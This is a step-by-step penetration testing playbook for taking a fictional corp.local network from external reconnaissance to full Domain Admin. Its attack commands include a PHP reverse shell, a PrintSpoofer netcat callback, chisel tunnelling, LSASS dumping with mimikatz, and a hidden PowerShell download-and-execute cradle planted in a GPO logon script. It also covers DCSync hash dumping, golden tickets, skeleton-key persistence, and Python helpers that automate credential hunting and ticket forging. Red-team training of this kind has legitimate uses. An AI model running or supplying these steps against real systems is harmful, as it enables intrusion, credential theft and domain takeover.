Pentesting Scenario: External to Domain Admin
Objective:
Start with external recon, gain a foothold on a DMZ web server, escalate privileges, pivot into the internal LAN, move laterally, enumerate Active Directory, and become Domain Admin — all while remaining stealthy and methodical.
Pentest Flow: External to Domain Admin
──────────────────────────────────────
[1] External Recon
├─ Subdomain & Service Discovery
└─ Identify Exposed CMS
↓
[2] Initial Access
├─ Exploit CMS Vulnerability (RCE)
└─ Upload Reverse Shell
↓
[3] Privilege Escalation (Local)
├─ System Enumeration
└─ Exploit SeImpersonatePrivilege → SYSTEM
↓
[4] Internal Recon & Pivoting
├─ Discover Internal Subnets & Domain
└─ Tunnel via Chisel/Proxychains
↓
[5] AD Enumeration
├─ List Shares, Users, SPNs
└─ Extract Creds from SYSVOL or Shares
↓
[6] Lateral Movement
├─ WinRM / PSExec to Reach Other Hosts
└─ Dump LSASS → Harvest Higher Priv Creds
↓
[7] Privilege Escalation (Domain)
├─ Abuse GPO / Delegation / Misconfigs
└─ Trigger Execution on Domain Controller
↓
[8] Post-Exploitation
├─ Dump Hashes / Tickets
├─ Golden Ticket / Persistence
└─ Full Domain Dominance
Phase 1: External Reconnaissance
Goal: Identify a vulnerable public-facing asset to gain initial access.
Passive Recon:
- Google Dorking, crt.sh, LinkedIn, Hunter.io
- Tools: theHarvester, subfinder, amass
- Discover subdomains such as vpn.corp.com, dev.corp.com, staging.corp.com (the public domain; corp.local is the internal AD domain you only reach after pivoting)
- Scrape employee names and the e-mail address format for social engineering and password spraying later.
Active Recon:
- Full TCP port sweep of each discovered host (fast but noisy; drop --min-rate and -T4 if the engagement calls for stealth, and save grepable output for triage):
nmap -sS -p- --min-rate 1000 -T4 -oG sweep.gnmap corp.com
- Version and default-script detection, limited to the ports the sweep found open:
nmap -sV -sC -Pn -p 21,22,80,443,445,3389 corp.com
- Identify an outdated CMS on dev.corp.com running Apache/PHP (server banners, version strings in README/changelog files, /administrator/ paths, whatweb).
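The two-step scan above (full sweep, then version detection only on open ports) is easy to script. The following is an added example for this write-up, not a tool from the original: it parses nmap's grepable (-oG) output and emits the follow-up -sV command per host. The scan output, host names and IPs below are constructed, not a real scan.

```python
"""Parse nmap grepable (-oG) output from a full port sweep and build the
follow-up version-detection command per host.  Example code added to this
write-up, not from any tool; the sample scan output below is constructed."""
import re

# Constructed sample of what `nmap -sS -p- -oG sweep.gnmap ...` writes for
# two hosts (host names, IPs and ports are made up for the example).
SAMPLE_GNMAP = """\
# Nmap 7.94 scan initiated
Host: 203.0.113.10 (www.corp.com)\tStatus: Up
Host: 203.0.113.10 (www.corp.com)\tPorts: 80/open/tcp//http///, 443/open/tcp//https///, 8443/filtered/tcp//https-alt///\tIgnored State: closed (65532)
Host: 203.0.113.11 (dev.corp.com)\tStatus: Up
Host: 203.0.113.11 (dev.corp.com)\tPorts: 22/open/tcp//ssh///, 80/open/tcp//http///, 3389/open/tcp//ms-wbt-server///
# Nmap done
"""

PORT_RE = re.compile(r"(\d+)/open/tcp")


def parse_open_ports(gnmap_text):
    """Return {ip: sorted list of open TCP ports} from grepable output.
    Only 'open' entries are kept; filtered/closed ports are dropped."""
    hosts = {}
    for line in gnmap_text.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue
        ip = line.split()[1]
        ports = [int(p) for p in PORT_RE.findall(line)]
        hosts.setdefault(ip, set()).update(ports)
    return {ip: sorted(ports) for ip, ports in hosts.items()}


def version_scan_commands(open_ports):
    """One targeted `nmap -sV -sC -Pn` command per host, limited to the ports
    the sweep found open (far quieter than re-scanning everything)."""
    cmds = []
    for ip, ports in sorted(open_ports.items()):
        port_list = ",".join(str(p) for p in ports)
        cmds.append(f"nmap -sV -sC -Pn -p {port_list} {ip}")
    return cmds


def web_hosts(open_ports, web_ports=(80, 443, 8080, 8443)):
    """Hosts with at least one web port open: candidates for CMS fingerprinting."""
    return [ip for ip, ports in sorted(open_ports.items())
            if any(p in ports for p in web_ports)]


if __name__ == "__main__":
    found = parse_open_ports(SAMPLE_GNMAP)
    for cmd in version_scan_commands(found):
        print(cmd)
    print("web candidates:", web_hosts(found))
```

Run the sweep with -oG, feed the file to parse_open_ports, and execute the generated commands; the filtered 8443 entry is deliberately excluded so the second scan does not hang on firewalled ports.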
Phase 2: Initial Access via Web Exploitation
Exploit:
- CMS plugin RCE using Metasploit (module path as given in this scenario; confirm the exact module for the fingerprinted version with "search joomla" in msfconsole):
use exploit/multi/http/joomla_plugin_upload
- Manual path: upload a PHP reverse shell via LFI/RFI or a misconfigured upload handler (no extension or MIME check, or a .phtml/.phar bypass).
Payload:
msfvenom -p php/reverse_php LHOST=ATTACKER LPORT=4444 -f raw > shell.php
(php/reverse_php is a plain TCP shell and can be caught with netcat; if you generate php/meterpreter_reverse_tcp instead, catch it with exploit/multi/handler, not nc, or you get an unusable connection.)
Access:
- Catch shell with:
nc -lvnp 4444
Result: You now have a low-privilege shell on the DMZ web server, running as the web server's service account.
Phase 3: Privilege Escalation (Local Host)
Enumeration:
whoami
whoami /priv
hostname
systeminfo
net user
wmic qfe
- The server is unpatched (e.g., the hotfix list shows nothing newer than 2016, so MS16-098 and later kernel bugs are candidates).
- The web service account holds SeImpersonatePrivilege (normal for IIS and Apache service accounts, and enough on its own; keep the kernel exploit as the fallback, since a failed kernel exploit can crash the box).
Exploit:
Use PrintSpoofer (Windows 10 / Server 2016-2019 with the Print Spooler running), JuicyPotato (Server 2012-2016, needs a working CLSID for the build), or RoguePotato/GodPotato on newer builds:
PrintSpoofer64.exe -i -c cmd.exe
-i asks for an interactive process, which only works from an interactive console; from a non-interactive web shell launch a second reverse shell instead, e.g. PrintSpoofer64.exe -c "C:\Temp\nc.exe ATTACKER 4445 -e cmd.exe".
Now you're NT AUTHORITY\SYSTEM.
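Deciding between the privilege-abuse route and a kernel exploit comes down to reading two command outputs: the token privileges from whoami /priv and the hotfix list from wmic qfe. The block below is an added triage helper written for this write-up (not part of the original, and not a replacement for winPEAS): it flags privileges with a known escalation route and reports which required KBs are missing. The command outputs are constructed samples; the KB identifier passed to missing_patches is a placeholder, not a verified mapping to MS16-098.

```python
"""Triage local-enumeration output from the foothold: flag token privileges
that give a known path to SYSTEM and check whether required hotfixes are
installed.  Example code added to this write-up; the command output below is
constructed, not captured from a real host."""
import re

# Privileges with a well-known local escalation route.  Names are spelled
# exactly as `whoami /priv` prints them.
DANGEROUS_PRIVS = {
    "SeImpersonatePrivilege": "PrintSpoofer / JuicyPotato / GodPotato",
    "SeAssignPrimaryTokenPrivilege": "Potato variants",
    "SeBackupPrivilege": "read SAM/SYSTEM hives or NTDS.dit",
    "SeRestorePrivilege": "overwrite service binaries / registry keys",
    "SeDebugPrivilege": "dump or inject into SYSTEM processes",
    "SeLoadDriverPrivilege": "load a vulnerable signed driver",
    "SeTakeOwnershipPrivilege": "take ownership of protected files",
}

# Constructed sample of `whoami /priv` on a web service account.
SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

# Constructed sample of `wmic qfe` output (two old updates, nothing recent).
SAMPLE_WMIC_QFE = """\
Caption                                     Description      HotFixID   InstalledOn
http://support.microsoft.com/?kbid=3199986  Update           KB3199986  11/15/2016
http://support.microsoft.com/?kbid=3172729  Security Update  KB3172729  7/20/2016
"""


def dangerous_privileges(whoami_priv_output):
    """Return [(privilege, state, escalation route)] for abusable privileges.
    A Disabled state is fine: the tools re-enable it with AdjustTokenPrivileges;
    only a privilege absent from the token is out of reach."""
    hits = []
    for line in whoami_priv_output.splitlines():
        m = re.match(r"(Se\w+Privilege)\s+.*?\s+(Enabled|Disabled)\s*$", line)
        if m and m.group(1) in DANGEROUS_PRIVS:
            hits.append((m.group(1), m.group(2), DANGEROUS_PRIVS[m.group(1)]))
    return hits


def installed_hotfixes(wmic_qfe_output):
    """Set of KB identifiers from `wmic qfe` (or `Get-HotFix`) output."""
    return set(re.findall(r"\bKB\d{6,7}\b", wmic_qfe_output))


def missing_patches(wmic_qfe_output, required_kbs):
    """KBs from required_kbs that are not installed: candidate kernel exploits."""
    return sorted(set(required_kbs) - installed_hotfixes(wmic_qfe_output))


if __name__ == "__main__":
    for priv, state, route in dangerous_privileges(SAMPLE_WHOAMI_PRIV):
        print(f"{priv} ({state}): {route}")
    # Placeholder KB: look up the real KB for the target build in the
    # MS16-098 bulletin before trusting this check (assumption, not verified).
    print("missing:", missing_patches(SAMPLE_WMIC_QFE, ["KB3177725"]))
```

Paste the real outputs into the two sample strings (or read them from files) and the first hit tells you which tool to drop on the host.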
Phase 4: Internal Reconnaissance & Pivoting
Map the Network:
ipconfig /all
route print
arp -a
netstat -ano
- Discover the internal subnet 10.0.10.0/24 (routes and ARP entries beyond the DMZ range, established connections in netstat).
- Confirm the host can reach the corp.local domain (DNS suffix in ipconfig, nltest /dsgetdc:corp.local).
Pivot:
Set up tunnelling:
- Chisel reverse SOCKS proxy. On the attacker box:
chisel server -p 8000 --reverse
  On the DMZ host (now SYSTEM):
chisel.exe client ATTACKER:8000 R:1080:socks
- Point proxychains at the listener (socks5 127.0.0.1 1080 in /etc/proxychains4.conf) and tunnel internal tools through it. Only full-connect scans work over SOCKS, so use -sT, skip host discovery with -Pn and avoid DNS with -n:
proxychains nmap -sT -Pn -n -p445,3389 10.0.10.0/24
- Discover the file server and the DC:
dc01.corp.local
Phase 5: Internal Enumeration & Credential Hunting
Tools:
CrackMapExec, smbclient, enum4linux-ng, ldapsearch
Run (null session first, then again with every credential you obtain):
proxychains cme smb 10.0.10.5 -u '' -p '' --shares
Finds:
- GPO scripts with hard-coded credentials in \\corp.local\SYSVOL\corp.local\scripts\deploy.bat (SYSVOL is readable by every domain user, so also search the Policies tree for Groups.xml cpassword entries and *.bat, *.vbs and *.ps1 files):
ithelpdesk:P@ssword123
Authenticate with:
proxychains evil-winrm -i 10.0.10.5 -u ithelpdesk -p 'P@ssword123'
Result: You're now ithelpdesk, a domain user. Before moving on, check where else the password is valid (cme smb 10.0.10.0/24 -u ithelpdesk -p 'P@ssword123') and whether the account is local admin anywhere (cme prints Pwn3d! on those hosts).
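Grepping SYSVOL by hand misses things, so the credential hunt above is worth automating. The block below is an added example for this write-up (not a tool from the original): it runs a small set of patterns over files copied from the share and reports each hard-coded secret with its path and line. The deploy.bat, Groups.xml and cleanup.bat contents are constructed samples, and the cpassword value is a made-up base64 string, not one that decrypts to anything.

```python
"""Scan scripts pulled from SYSVOL (or any share) for hard-coded credentials.
Example code added to this write-up; the sample files are constructed to look
like what the text describes (a deploy.bat with an embedded password and a
Group Policy Preferences XML carrying a cpassword)."""
import re

# Constructed samples, keyed by the UNC path they would have come from.
SAMPLE_FILES = {
    r"\\corp.local\SYSVOL\corp.local\scripts\deploy.bat": (
        "@echo off\r\n"
        "net use Z: \\\\fs01\\software /user:corp\\ithelpdesk P@ssword123\r\n"
        "xcopy Z:\\agent\\*.* C:\\Temp\\ /E /Y\r\n"
    ),
    r"\\corp.local\SYSVOL\corp.local\Policies\{31B2F340}\Machine\Preferences\Groups\Groups.xml": (
        '<Groups><User name="localadm" '
        'cpassword="dAzVYOiCQwB/RlZvIKdUuFnGKiIIjWX+tO6OgjbQwbA" '
        'userName="localadm"/></Groups>'
    ),
    r"\\corp.local\SYSVOL\corp.local\scripts\cleanup.bat": (
        "@echo off\r\ndel /q C:\\Temp\\*.log\r\n"
    ),
}

# (label, compiled pattern, capture group holding the secret).  Order matters:
# the first pattern that matches a line wins.
PATTERNS = [
    ("net use with inline password",
     re.compile(r"net\s+use\b.*?/user:(\S+)\s+(\S+)", re.I), 2),
    ("GPP cpassword (AES key is public; decrypt with gpp-decrypt)",
     re.compile(r'cpassword="([^"]+)"', re.I), 1),
    ("password assignment",
     re.compile(r"""(?:password|passwd|pwd)\s*[=:]\s*["']?([^"'\s]+)""", re.I), 1),
    ("runas / psexec with -p",
     re.compile(r"(?:runas|psexec).*?(?:/user:|-u\s+)(\S+).*?-p\s+(\S+)", re.I), 2),
]


def hunt_credentials(files):
    """Return findings as (path, line_no, label, secret), one per matching line."""
    findings = []
    for path, text in files.items():
        for n, line in enumerate(text.splitlines(), 1):
            for label, pattern, group in PATTERNS:
                m = pattern.search(line)
                if m:
                    findings.append((path, n, label, m.group(group)))
                    break  # one finding per line is enough for triage
    return findings


def accounts_from_net_use(files):
    """(user, password) pairs from `net use ... /user:DOMAIN\\user pass` lines,
    ready to feed to cme/evil-winrm."""
    pairs = []
    for text in files.values():
        for m in PATTERNS[0][1].finditer(text):
            pairs.append((m.group(1), m.group(2)))
    return pairs


if __name__ == "__main__":
    for path, n, label, secret in hunt_credentials(SAMPLE_FILES):
        print(f"{path}:{n}: {label}: {secret}")
```

In practice mount or mirror the share (smbclient -c 'recurse ON; prompt OFF; mget *' through proxychains), build the files dict from the local copy, and add patterns for whatever scripting conventions the target uses.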
Phase 6: Lateral Movement
Step-by-step:
- Collect the domain graph with SharpHound (run through the WinRM session, or bloodhound-python via the proxy from the attacker box) and load it into BloodHound.
- Analyze the shortest path to Domain Admins:
ithelpdesk → srv-helpdesk → svcadmin → DC
  (in this scenario ithelpdesk is local admin on srv-helpdesk, and svcadmin has a logged-on session there.)
Pivot Again:
- From ithelpdesk to srv-helpdesk via PsExec or WinRM (local admin rights are required for both, and for the LSASS dump that follows).
- Dump LSASS (procdump is Microsoft-signed, so it draws less attention than copying mimikatz to the host, but expect EDR to flag any LSASS handle):
procdump -accepteula -ma lsass.exe lsass.dmp
- Extract credentials, preferably offline on the attacker box after copying the dump out:
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords" exit
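What BloodHound does with the SharpHound data is a shortest-path search over a directed graph of AD relationships. The block below is an added example for this write-up, not BloodHound code: it runs a breadth-first search over a constructed miniature of the ithelpdesk → srv-helpdesk → svcadmin → DC path (group, computer, GPO and OU names are made up; edge names follow BloodHound's vocabulary, with HasSession pointing from computer to user as BloodHound draws it).

```python
"""Find an attack path the way BloodHound does: breadth-first search over a
graph of AD relationships (MemberOf, AdminTo, HasSession, GenericWrite ...).
Example code added to this write-up; the edges are a constructed miniature of
the path described above, not real collector output."""
from collections import deque

# (source, relationship, target), constructed to mirror the scenario.
SAMPLE_EDGES = [
    ("ITHELPDESK@CORP.LOCAL",   "MemberOf",     "HELPDESK@CORP.LOCAL"),
    ("HELPDESK@CORP.LOCAL",     "AdminTo",      "SRV-HELPDESK.CORP.LOCAL"),
    ("SRV-HELPDESK.CORP.LOCAL", "HasSession",   "SVCADMIN@CORP.LOCAL"),
    ("SVCADMIN@CORP.LOCAL",     "MemberOf",     "GPO EDITORS@CORP.LOCAL"),
    ("GPO EDITORS@CORP.LOCAL",  "GenericWrite", "DC LOGON SCRIPT GPO"),
    ("DC LOGON SCRIPT GPO",     "GpLink",       "DOMAIN CONTROLLERS OU"),
    ("DOMAIN CONTROLLERS OU",   "Contains",     "DC01.CORP.LOCAL"),
    ("ITHELPDESK@CORP.LOCAL",   "CanRDP",       "WS-FINANCE.CORP.LOCAL"),  # dead end
]


def build_graph(edges):
    """Adjacency list: node -> [(relationship, neighbour), ...]."""
    graph = {}
    for src, rel, dst in edges:
        graph.setdefault(src, []).append((rel, dst))
    return graph


def shortest_path(edges, start, goal):
    """BFS from start to goal.  Returns an alternating list
    [node, rel, node, rel, ..., node] or None if goal is unreachable.
    BFS guarantees the fewest hops, which is what the BloodHound
    'Shortest Path' queries report."""
    graph = build_graph(edges)
    queue = deque([[start]])
    seen = {start}
    while queue:
        path = queue.popleft()
        node = path[-1]
        if node == goal:
            return path
        for rel, nxt in graph.get(node, []):
            if nxt not in seen:
                seen.add(nxt)
                queue.append(path + [rel, nxt])
    return None


def render(path):
    """Human-readable form: A -[MemberOf]-> B -[AdminTo]-> C ..."""
    out = path[0]
    for i in range(1, len(path), 2):
        out += f" -[{path[i]}]-> {path[i + 1]}"
    return out


if __name__ == "__main__":
    p = shortest_path(SAMPLE_EDGES, "ITHELPDESK@CORP.LOCAL", "DC01.CORP.LOCAL")
    print(render(p) if p else "no path")
```

Each edge in the returned path is one concrete action on the engagement (authenticate to the host, dump the session's credentials, edit the GPO), so the path doubles as the step list for the rest of the attack and for the report.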
Phase 7: Escalating to Domain Admin
Target:
svcadmin is a member of the GPO Editor group (in this scenario a custom group that holds edit rights on the policy).
- GPO is linked to the Domain Controllers OU
- GPO contains a logon.bat script
Weaponize:
Edit the script to include:
powershell -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://attacker/rev.ps1')"
Force a refresh (gpupdate /force on the DC, if you can already run commands there) or wait for the next logon.
A logon script runs as the user who logs on, so this gives a shell with the rights of whichever admin next logs on to the DC. For SYSTEM directly, put the command in the GPO's computer startup script or an Immediate Scheduled Task under Computer Configuration instead (what SharpGPOAbuse automates). Either way rev.ps1 must connect back to the listener port below.
Result:
SYSTEM shell on the Domain Controller:
nc -lvnp 5555
whoami
Phase 8: Post-Exploitation
Actions:
- Dump AD hashes (DCSync over DRSUAPI, using the svcadmin credentials from Phase 6 or the DA context you now hold; -just-dc limits the dump to NTDS secrets):
secretsdump.py corp.local/svcadmin:P@ssword123@dc01.corp.local -just-dc
- Create a golden ticket from the krbtgt secret in that dump (kerberos::ptt only injects a ticket you already have; the domain SID comes from lookupsid.py or whoami /user minus the RID):
kerberos::golden /user:Administrator /domain:corp.local /sid:<domain SID> /krbtgt:<krbtgt NT hash> /ticket:ticket.kirbi
kerberos::ptt ticket.kirbi
- Persistence: DSRM backdoor, skeleton key, malicious GPO (agree each with the client first)
- Clean up: restore logon.bat, remove uploaded shells, LSASS dumps and chisel binaries, and record every change for the report.
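The values the golden ticket command needs (krbtgt NT hash or AES256 key, domain SID) are scattered across the secretsdump output and a SID lookup. The block below is an added example for this write-up, not part of impacket or mimikatz: it parses the dump in secretsdump's domain\user:rid:lmhash:nthash::: format, derives the domain SID from any domain account's SID, and assembles the mimikatz line, preferring the AES256 key because RC4-only tickets stand out in monitored environments. The dump lines and hashes are constructed, not real.

```python
"""Pull what a golden ticket needs out of a secretsdump NTDS dump (the krbtgt
NT hash, or better its AES256 key) and derive the domain SID from any domain
account's SID.  Example code added to this write-up; the dump lines are
constructed in secretsdump's output format and the hashes are not real."""
import re

SAMPLE_SECRETSDUMP = """\
[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
corp.local\\Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
corp.local\\Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
corp.local\\krbtgt:502:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
corp.local\\svcadmin:1105:aad3b435b51404eeaad3b435b51404ee:00112233445566778899aabbccddeeff:::
[*] Kerberos keys grabbed
corp.local\\krbtgt:aes256-cts-hmac-sha1-96:1111111111111111111111111111111111111111111111111111111111111111
corp.local\\krbtgt:aes128-cts-hmac-sha1-96:22222222222222222222222222222222
"""

# domain\user:rid:lmhash:nthash:::   (domain prefix is optional in the output)
NTLM_RE = re.compile(r"^(?:[^\\\s]+\\)?([^:\s]+):(\d+):([0-9a-f]{32}):([0-9a-f]{32}):::", re.I)
# domain\user:aes256-cts-hmac-sha1-96:<64 hex chars>
AES_RE = re.compile(r"^(?:[^\\\s]+\\)?([^:\s]+):aes256-cts-hmac-sha1-96:([0-9a-f]{64})", re.I)


def parse_dump(text):
    """Return {account: {'rid': int, 'nt': hex, 'aes256': hex}} (aes256 only
    when the dump includes Kerberos keys)."""
    accounts = {}
    for line in text.splitlines():
        m = NTLM_RE.match(line)
        if m:
            user, rid, _lm, nt = m.groups()
            entry = accounts.setdefault(user.lower(), {})
            entry["rid"] = int(rid)
            entry["nt"] = nt.lower()
            continue
        m = AES_RE.match(line)
        if m:
            accounts.setdefault(m.group(1).lower(), {})["aes256"] = m.group(2).lower()
    return accounts


def domain_sid_from_user_sid(user_sid):
    """S-1-5-21-a-b-c-RID -> S-1-5-21-a-b-c, i.e. what `whoami /user` prints
    for a domain account, minus the trailing RID."""
    if not re.fullmatch(r"S-1-5-21(-\d+){4}", user_sid):
        raise ValueError("not a domain account SID")
    return user_sid.rsplit("-", 1)[0]


def golden_ticket_command(dump_text, domain_sid, domain="corp.local", user="Administrator"):
    """Build the mimikatz kerberos::golden line.  Uses /aes256 when the key is
    available (RC4 tickets are easy to spot), otherwise falls back to /krbtgt."""
    krbtgt = parse_dump(dump_text).get("krbtgt")
    if not krbtgt:
        raise ValueError("no krbtgt entry in dump")
    if krbtgt.get("aes256"):
        key = f"/aes256:{krbtgt['aes256']}"
    else:
        key = f"/krbtgt:{krbtgt['nt']}"
    return (f"kerberos::golden /user:{user} /domain:{domain} /sid:{domain_sid} "
            f"{key} /ticket:ticket.kirbi")


if __name__ == "__main__":
    sid = domain_sid_from_user_sid("S-1-5-21-1004336348-1177238915-682003330-1105")
    print(golden_ticket_command(SAMPLE_SECRETSDUMP, sid))
```

Save the secretsdump output with -outputfile and point parse_dump at the .ntds and .ntds.kerberos files; the same parser also gives you every account's NT hash for pass-the-hash checks with cme.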
Final Mindmap:
External Recon
└── Find CMS
└── Web Exploit → Web Shell
└── Priv Esc → SYSTEM
└── Internal Recon
└── Pivoting (Chisel)
└── SMB/AD Enum
└── Creds in SYSVOL
└── Lateral Movement (WinRM)
└── Credential Dump
└── GPO Misconfig
└── Domain Admin
└── Post Exploitation
Tool Cheatsheet by Phase
| Phase | Tools |
|---|---|
| Recon (External) | Nmap, Subfinder, Shodan |
| Initial Access | Metasploit, FFUF, Burp |
| Privilege Escalation | WinPEAS, PrintSpoofer |
| Internal Recon | ipconfig, netstat, route |
| Pivoting | Chisel, reGeorg, proxychains |
| AD Enumeration | BloodHound, CME, ldapsearch |
| Lateral Movement | Evil-WinRM, PSExec |
| Exploiting AD | Mimikatz, GPO Abuse |
| Post-Exploitation | secretsdump, golden ticket, DSAdd |
